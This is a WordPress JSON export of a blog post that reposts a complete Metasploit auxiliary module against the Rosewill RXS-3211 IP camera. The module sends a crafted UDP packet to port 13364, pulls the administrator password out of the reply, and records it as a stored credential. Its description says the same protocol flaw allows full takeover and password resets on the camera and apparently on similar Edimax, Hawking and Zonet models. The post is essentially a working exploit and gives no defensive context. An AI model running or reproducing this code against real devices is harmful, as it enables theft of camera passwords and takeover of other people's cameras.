{"id":59373,"date":"2024-09-01T22:39:54","date_gmt":"2024-09-01T19:39:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181216\/rosewill_rxs3211_passwords.rb.txt"},"modified":"2024-09-01T22:39:54","modified_gmt":"2024-09-01T19:39:54","slug":"rosewill-rxs-3211-ip-camera-password-retriever","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/rosewill-rxs-3211-ip-camera-password-retriever\/","title":{"rendered":"Rosewill RXS-3211 IP Camera Password Retriever"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner<\/p>\n

def initialize
super(
‘Name’ => ‘Rosewill RXS-3211 IP Camera Password Retriever’,
‘Description’ => %q{
This module takes advantage of a protocol design issue with the Rosewill admin
executable in order to retrieve passwords, allowing remote attackers to take
administrative control over the device. Other similar IP Cameras such as Edimax,
Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.
The protocol design issue also allows attackers to reset passwords on the device.
},
‘Author’ => ‘Ben Schmidt’,
‘License’ => MSF_LICENSE
)<\/p>\n

register_options(
[
Opt::CHOST,
Opt::RPORT(13364),
])
end<\/p>\n

def run_host(ip)
#Protocol
target_mac = “\\xff\\xff\\xff\\xff\\xff\\xff”
cmd = “\\x00” #Request
cmd << “\\x06\\xff\\xf9” #Type<\/p>\n

password = nil<\/p>\n

begin
udp_sock = Rex::Socket::Udp.create( {
‘LocalHost’ => datastore[‘CHOST’] || nil,
‘PeerHost’ => ip,
‘PeerPort’ => datastore[‘RPORT’],
‘Context’ =>
{
‘Msf’ => framework,
‘MsfExploit’ => self
}
})<\/p>\n

udp_sock.put(target_mac+cmd)<\/p>\n

res = udp_sock.recvfrom(65535, 0.5) and res[1]\n

#Parse the reply if we get a response
if res
password = parse_reply(res)
end
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
print_error(“Connection error”)
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error(“Unknown error: #{e.class} #{e}”)
ensure
udp_sock.close if udp_sock
end<\/p>\n

#Store the password if the parser returns something
if password
print_good(“Password retrieved: #{password.to_s}”)
report_cred(
ip: rhost,
port: rport,
service_name: ‘ipcam’,
user: ”,
password: password,
proof: password
)
end
end<\/p>\n

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)<\/p>\n

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]}.merge(service_data)<\/p>\n

create_credential_login(login_data)
end<\/p>\n

def parse_reply(pkt)
@results ||= {}<\/p>\n

# Ignore “empty” packets
return nil if not pkt[1]\n

if(pkt[1] =~ \/^::ffff:\/)
pkt[1] = pkt[1].sub(\/^::ffff:\/, ”)
end<\/p>\n

return pkt[0][333,12] if pkt[0][6,4] == “\\x01\\x06\\xff\\xf9”
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::Udpinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘Rosewill RXS-3211 IP Camera Password Retriever’,‘Description’ => %q{This module takes advantage of a protocol design issue with the Rosewill adminexecutable in order to retrieve passwords, allowing remote attackers to takeadministrative control over the device. Other similar …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59373","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59373","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59373"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59373\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59373"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59373"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59373"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}